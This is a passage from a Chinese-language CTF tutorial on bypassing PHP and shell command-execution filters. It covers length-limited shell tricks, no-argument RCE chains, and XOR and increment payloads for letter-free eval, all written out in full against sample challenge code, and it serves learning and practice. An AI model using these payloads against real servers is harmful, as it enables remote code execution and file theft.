class="comment">#检查是否攻击成功</span></span><br><span class="line">test = requests.<span class="title function_ invoke__">get</span>(<span class="string">&quot;http://192.168.61.157/1.php&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> test.status_code == requests.codes.ok:</span><br><span class="line">    <span class="keyword">print</span>(<span class="string">&quot;[*]Attack success!!!&quot;</span>)</span><br></pre></td></tr></table></figure>

<h5 id="长度为4绕过"><a href="#长度为4绕过" class="headerlink" title="长度为4绕过"></a>长度为4绕过</h5><p>预备知识：</p>
<p>1：<strong>输入统配符* ，Linux会把第一个列出的文件名当作命令，剩下的文件名当作参数</strong></p>
<p><img src="/img/1722310534824-7.png" alt="img"></p>
<p>2：增加字母来限定被用来当作命令和参数的文件名</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&gt;ls</span><br><span class="line">&gt;lss</span><br><span class="line">&gt;lsss</span><br><span class="line">&gt;<span class="number">1</span></span><br><span class="line">*<span class="title function_ invoke__">s</span>       (等同于命令： ls lss lsss)</span><br></pre></td></tr></table></figure>

<p><img src="/img/1722310534824-8.png" alt="img"></p>
<p>3:通过rev来倒置输出内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;rev</span><br><span class="line"><span class="keyword">echo</span> <span class="number">1234</span> &gt; v</span><br><span class="line">*v    （等同于命令：rev v）</span><br></pre></td></tr></table></figure>

<p>4：通过增加ls的-h（把文件大小显示成1k 1M 等形式）参数来让调整-t（根据时间排序）参数的位置 我们之后需要用到rev 倒置输出</p>
<p>所以需要列出这样形式的文件名</p>
<p>0&gt;  t-  sl      </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;<span class="number">0</span>\&gt;</span><br><span class="line">&gt;t-</span><br><span class="line">&gt;sl</span><br></pre></td></tr></table></figure>

<p><img src="/img/1722310534825-9.png" alt="img"></p>
<p>但是输出有点不尽人意，这里需要使用-h来使t往前拉</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;<span class="number">0</span>\&gt;</span><br><span class="line">&gt;ht-</span><br><span class="line">&gt;sl</span><br></pre></td></tr></table></figure>

<p><img src="/img/1722310534825-10.png" alt="img"></p>
<p>5：用dir来代替ls不换行输出</p>
<p><img src="/img/1722310534825-11.png" alt="img"></p>
<p>最后构建payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&gt;dir</span><br><span class="line">&gt;f\&gt;</span><br><span class="line">&gt;ht-</span><br><span class="line">&gt;sl</span><br><span class="line">*&gt;v        (等同于命令：dir &quot;f&gt;&quot; &quot;ht-&quot; &quot;sl&quot; &gt; v)</span><br><span class="line">&gt;rev</span><br><span class="line">*v&gt;0        (等同于命令：rev v &gt; 0)(0里面的内容位:ls -th &gt;f)</span><br><span class="line">sh 0        (sh执行0里面的内容)</span><br></pre></td></tr></table></figure>

<h4 id="无参数RCE绕过"><a href="#无参数RCE绕过" class="headerlink" title="无参数RCE绕过"></a>无参数RCE绕过</h4><p>题目特征</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;star&#x27;</span>])) &#123;    </span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;star&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>正则表达式 [^\W]+((?R)?) 匹配了一个或多个非标点符号字符（表示函数名），后跟一个括号（表示函数调用）。其中 (?R) 是递归引用，它只能匹配和替换嵌套的函数调用，而不能处理函数参数。使用该正则表达式进行替换后，每个函数调用都会被删除，只剩下一个分号 ;，而最终结果强等于；时，payload才能进行下一步。</p>
<p>相关函数介绍</p>
<p>scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组，其中包含当前目录下的所有文件和目录名称（glob()可替换）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">scandir</span>(<span class="string">&#x27;.&#x27;</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">输出结果</span><br><span class="line">(</span><br><span class="line">    [<span class="number">0</span>] =&gt; .</span><br><span class="line">    [<span class="number">1</span>] =&gt; ..</span><br><span class="line">    [<span class="number">2</span>] =&gt; .idea</span><br><span class="line">    [<span class="number">3</span>] =&gt; <span class="number">1</span>.php</span><br><span class="line">    [<span class="number">4</span>] =&gt; NISACTF.php</span><br><span class="line">    [<span class="number">5</span>] =&gt; test.php</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=getcwd&spm=1001.2101.3001.7020">getcwd</a>() :取得当前工作目录</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">print_r(getcwd());</span><br><span class="line">?&gt;</span><br><span class="line"><span class="comment">#D:\web\study-test</span></span><br></pre></td></tr></table></figure>

<p>current() ：返回数组中的单元，默认取第一个值</p>
<p>next()：返回数组中的单元，默认取第二个值</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a = [<span class="number">4</span>,<span class="number">5</span>,<span class="number">7</span>];</span><br><span class="line">print_r(<span class="built_in">next</span>($a));</span><br><span class="line">?&gt;</span><br><span class="line"><span class="comment">#5</span></span><br><span class="line">&lt;?php</span><br><span class="line">$a = [<span class="number">4</span>,<span class="number">5</span>,<span class="number">7</span>];</span><br><span class="line">print_r(current($a));</span><br><span class="line">?&gt;</span><br><span class="line"><span class="comment">#4</span></span><br></pre></td></tr></table></figure>

<p>array_flip() :交换数组中的键和值，成功时返回交换后的数组 array_rand() :从数组中随机取出一个或多个单元</p>
<p>array_reverse():将数组内容反转</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#array_flip():将键名值进行对调</span></span><br><span class="line">Array</span><br><span class="line">(</span><br><span class="line">    [<span class="number">4</span>] =&gt; <span class="number">0</span></span><br><span class="line">    [<span class="number">5</span>] =&gt; <span class="number">1</span></span><br><span class="line">    [<span class="number">7</span>] =&gt; <span class="number">2</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">#array_reverse()</span></span><br><span class="line">Array</span><br><span class="line">(</span><br><span class="line">    [<span class="number">0</span>] =&gt; <span class="number">7</span></span><br><span class="line">    [<span class="number">1</span>] =&gt; <span class="number">5</span></span><br><span class="line">    [<span class="number">2</span>] =&gt; <span class="number">4</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">#array_rand</span></span><br><span class="line">&lt;?php</span><br><span class="line">$a = [<span class="number">4</span>,<span class="number">5</span>,<span class="number">7</span>];</span><br><span class="line">print_r(array_rand($a));</span><br><span class="line">?&gt;</span><br><span class="line"><span class="comment">#1或2或0</span></span><br></pre></td></tr></table></figure>

<p>localeconv() ：返回一包含本地数字及货币格式信息的数组。（但是这里数组第一项就是‘.’，这个.的用处很大）</p>
<p>strrev():用于反转给定字符串。</p>
<p>dirname() ：函数返回路径中的目录部分。 chdir() ：函数改变当前的目录。</p>
<p>例题：[GXYCTF2019]禁止套娃</p>
<p>dirmap扫描，发现.git泄露</p>
<p><img src="/img/1722310534825-12.png" alt="img"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 GitHack.py http://c9a8fee7-08d6-42c9-acc9-423dfb35eafb.node5.buuoj.cn:<span class="number">81</span>/.git/</span><br></pre></td></tr></table></figure>

<p><img src="/img/1722310534825-13.png" alt="img"></p>
<p>发现index.php,如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;flag在哪里呢？&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[a-z,_]+\((?R)?\)/&#x27;</span>, <span class="literal">NULL</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/et|na|info|dec|bin|hex|oct|pi|log/i&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">                <span class="comment">// echo $_GET[&#x27;exp&#x27;];</span></span><br><span class="line">                @<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;还差一点哦！&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;再好好想想！&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;还想读flag，臭弟弟！&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="scandir-读取"><a href="#scandir-读取" class="headerlink" title="scandir()读取"></a>scandir()读取</h5><p>1：bp抓包，?exp&#x3D;var_dump(localeconv());这里我们能看见第一个string[1]就是一个“.”，这个点是由localeconv()产生的</p>
<p><img src="/img/1722310534826-14.png" alt="img"></p>
<p>2：利用<code>current()</code>函数将这个点取出来的，<code>‘.’</code>代表的是当前目录</p>
<p><img src="/img/1722310534826-15.png" alt="img"></p>
<p>3：既然current()取第一个值，那么current(localeconv())构造一个<code>‘.’,</code><strong><code>而</code></strong><code>&#39;.&#39;</code> 表示当前目录，<code>scandir(&#39;.&#39;)</code> 将返回当前目录中的文件和子目录，这里我们得知flag所在的文件名就是flag.php</p>
<p><img src="/img/1722310534826-16.png" alt="img"></p>
<p>4、然而flag的文件名在比较后端我们可以通过array_reverse()将数组内容反转，让它从倒数第二的位置变成正数第二</p>
<p><img src="/img/1722310534826-17.png" alt="img"></p>
<p>5：接下来我们可以选择next()函数来读取flag.php</p>
<p><img src="/img/1722310534826-18.png" alt="img"></p>
<p>6:使用highlight_file来读取文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=highlight_file(<span class="built_in">next</span>(array_reverse(scandir(current(localeconv())))));</span><br></pre></td></tr></table></figure>

<p><img src="/img/1722310534826-19.png" alt="img"></p>
<h5 id="session-id-读取"><a href="#session-id-读取" class="headerlink" title="session_id()读取"></a>session_id()读取</h5><h6 id="hex2bin（）读取"><a href="#hex2bin（）读取" class="headerlink" title="hex2bin（）读取"></a>hex2bin（）读取</h6><p>对所要执行的命令进行16进制编码，通过在<strong>Cookie: PHPSESSID&#x3D;””</strong> 添加自己所要执行的命令</p>
<p>最后在使用hexbin()进行解码就行，从而达到命令执行的效果</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?参数=<span class="built_in">eval</span>(hex2bin(session_id(session_start())));</span><br></pre></td></tr></table></figure>

<h6 id="直接读取"><a href="#直接读取" class="headerlink" title="直接读取"></a>直接读取</h6><p>还是以上题为例，假如我们知道flag.php的文件时，我们直接读文件</p>
<p>添加：<strong>Cookie: PHPSESSID&#x3D;flag.php</strong></p>
<p><img src="/img/1722310534826-20.png" alt="img"></p>
<h5 id="getallheaders-读取"><a href="#getallheaders-读取" class="headerlink" title="getallheaders()读取"></a>getallheaders()读取</h5><p>getallheaders()返回当前请求的所有请求头信息，局限于Apache（apache_request_headers()和getallheaders()功能相似，可互相替代，不过也是局限于Apache）</p>
<p>当确定能够返回时，我们就能在数据包最后一行加上一个请求头，写入恶意代码，再用end()函数指向最后一个请求头，使其执行，payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=var_dump(end(getallheaders()));    <span class="comment">#print_r,echo</span></span><br></pre></td></tr></table></figure>

<p><img src="/img/1722310534826-21.png" alt="img"></p>
<p>sky是自己添加的请求头， end()指向最后一行的sky后的代码，达到phpinfo的目的，然后可以进一步去rce</p>
<h5 id="get-defined-vars-读取"><a href="#get-defined-vars-读取" class="headerlink" title="get_defined_vars()读取"></a>get_defined_vars()读取</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">get_defined_vars</span>());</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里我们可以看出其返回的数组类型的先后顺序为$_GET–&gt;$_POST–&gt;$_COOKIE–&gt;$_FILES</p>
<p><img src="/img/1722310534826-22.png" alt="img"></p>
<p>即我们可以多加一个参数来进行命令执行，即执行后面的恶意语句，例子如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=<span class="keyword">eval</span>(<span class="title function_ invoke__">end</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">get_defined_vars</span>())));&amp;b=<span class="title function_ invoke__">system</span>(<span class="string">&#x27;ls /&#x27;</span>);</span><br></pre></td></tr></table></figure>

<h5 id="chdir-array-rand-读取"><a href="#chdir-array-rand-读取" class="headerlink" title="chdir()&amp;array_rand()读取"></a>chdir()&amp;array_rand()读取</h5><p>实在无法rce，可以进行目录遍历</p>
<p>结合dirname()列出当前工作目录的父目录中的所有文件和目录:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">dirname</span>(<span class="title function_ invoke__">getcwd</span>())));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>读根目录:</p>
<p>ord() 函数和 chr() 函数：只能对第一个字符进行转码，ord() 编码，chr()解码，有概率会解码出斜杠读取根目录</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">chr</span>(<span class="title function_ invoke__">ord</span>(<span class="title function_ invoke__">strrev</span>(<span class="title function_ invoke__">crypt</span>(<span class="title function_ invoke__">serialize</span>(<span class="keyword">array</span>())))))));</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">#print_r(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array() )))))))))));</span></span><br><span class="line"><span class="comment">#可以测试一下，有几率读出根目录，本人亲测</span></span><br></pre></td></tr></table></figure>

<p>读上一级文件名</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">?code=<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">array_rand</span>(<span class="title function_ invoke__">array_flip</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">dirname</span>(<span class="title function_ invoke__">chdir</span>(<span class="title function_ invoke__">dirname</span>(<span class="title function_ invoke__">getcwd</span>())))))));</span><br><span class="line"></span><br><span class="line">?code=<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">array_rand</span>(<span class="title function_ invoke__">array_flip</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">chr</span>(<span class="title function_ invoke__">ord</span>(<span class="title function_ invoke__">hebrevc</span>(<span class="title function_ invoke__">crypt</span>(<span class="title function_ invoke__">chdir</span>(<span class="title function_ invoke__">next</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">getcwd</span>())))))))))));</span><br><span class="line"></span><br><span class="line">?code=<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">array_rand</span>(<span class="title function_ invoke__">array_flip</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">chr</span>(<span class="title function_ invoke__">ord</span>(<span class="title function_ invoke__">hebrevc</span>(<span class="title function_ invoke__">crypt</span>(<span class="title function_ invoke__">chdir</span>(<span class="title function_ invoke__">next</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">chr</span>(<span class="title function_ invoke__">ord</span>(<span class="title function_ invoke__">hebrevc</span>(<span class="title function_ invoke__">crypt</span>(<span class="title function_ invoke__">phpversion</span>())))))))))))))));</span><br><span class="line"></span><br><span class="line">可以将show_source换成print_r,建议使用第一个</span><br></pre></td></tr></table></figure>

<h4 id="无字母数字的绕过"><a href="#无字母数字的绕过" class="headerlink" title="无字母数字的绕过"></a>无字母数字的绕过</h4><h5 id="异或绕过"><a href="#异或绕过" class="headerlink" title="异或绕过"></a>异或绕过</h5><p><strong>[HUBUCTF 2022 新生赛]HowToGetShell</strong></p>
<p>涉及知识点：无字母RCE-异或绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">$mess=$_POST[<span class="string">&#x27;mess&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/[a-zA-Z]/&quot;</span>,$mess))&#123;</span><br><span class="line">    die(<span class="string">&quot;invalid input!&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">eval</span>($mess);</span><br><span class="line"><span class="comment">#过滤了所有大小写字母</span></span><br><span class="line"><span class="comment">#这里采用异或绕过</span></span><br><span class="line">valid = <span class="string">&quot;1234567890!@$%^*()&#123;&#125;[];\&#x27;\&quot;,.&lt;&gt;/?-=_`~ &quot;</span></span><br><span class="line"></span><br><span class="line">answer = <span class="string">&quot;phpinfo&quot;</span></span><br><span class="line"></span><br><span class="line">tmp1, tmp2 = <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> answer:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> valid:</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> valid:</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">ord</span>(i) ^ <span class="built_in">ord</span>(j) == <span class="built_in">ord</span>(c)):</span><br><span class="line">                tmp1 += i</span><br><span class="line">                tmp2 += j</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(tmp1)  <span class="comment"># 0302181</span></span><br><span class="line"><span class="built_in">print</span>(tmp2)  <span class="comment"># @[@[_^^</span></span><br><span class="line"><span class="comment">#payload: mess=$_=&quot;0302181&quot;^&quot;@[@[_^^&quot;;$_();</span></span><br></pre></td></tr></table></figure>

<h5 id="自增绕过"><a href="#自增绕过" class="headerlink" title="自增绕过"></a>自增绕过</h5><p>简介：</p>
<p>自增（Increment）通常指的是将某个值增加一个固定的增量。在编程中，自增通常用于循环计数、迭代或者更新变量的值等情况。</p>
<p><strong>[SWPUCTF 2021 新生赛]hardrce_3</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&quot;Content-Type:text/html;charset=utf-8&quot;</span>); </span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>); </span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>); </span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;wllm&#x27;</span>])) </span><br><span class="line">&#123; </span><br><span class="line">    <span class="variable">$wllm</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;wllm&#x27;</span>]; </span><br><span class="line">    <span class="variable">$blacklist</span> = [<span class="string">&#x27; &#x27;</span>,<span class="string">&#x27;\^&#x27;</span>,<span class="string">&#x27;\~&#x27;</span>,<span class="string">&#x27;\|&#x27;</span>]; </span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$blacklist</span> <span class="keyword">as</span> <span class="variable">$blackitem</span>) </span><br><span class="line">    &#123; </span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/&#x27;</span> . <span class="variable">$blackitem</span> . <span class="string">&#x27;/m&#x27;</span>, <span class="variable">$wllm</span>)) &#123; </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;小伙子只会异或和取反？不好意思哦LTLT说不能用！！&quot;</span>); </span><br><span class="line">    &#125;&#125; </span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/[a-zA-Z0-9]/is&#x27;</span>,<span class="variable">$wllm</span>)) </span><br><span class="line">&#123; </span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;Ra&#x27;sAlGhul说用字母数字是没有灵魂的！&quot;</span>); </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;NoVic4说：不错哦小伙子，可你能拿到flag吗？&quot;</span>; </span><br><span class="line"><span class="keyword">eval</span>(<span class="variable">$wllm</span>); </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">else</span> </span><br><span class="line">&#123; </span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;蔡总说：注意审题！！！&quot;</span>; </span><br><span class="line">&#125; </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过构造assert($<em>POST[</em>]);然后通过poat传参_&#x3D;phpinfo()[系统所要执行的命令即可</p>
<p>payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%24_%3d%5b%5d%3b%24_%3d%<span class="number">40</span>%<span class="number">22</span>%24_%<span class="number">22</span>%3b%24_%3d%24_%5b%<span class="number">27</span>!%<span class="number">27</span>%3d%3d%<span class="number">27</span>%<span class="number">40</span>%<span class="number">27</span>%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d%27_%<span 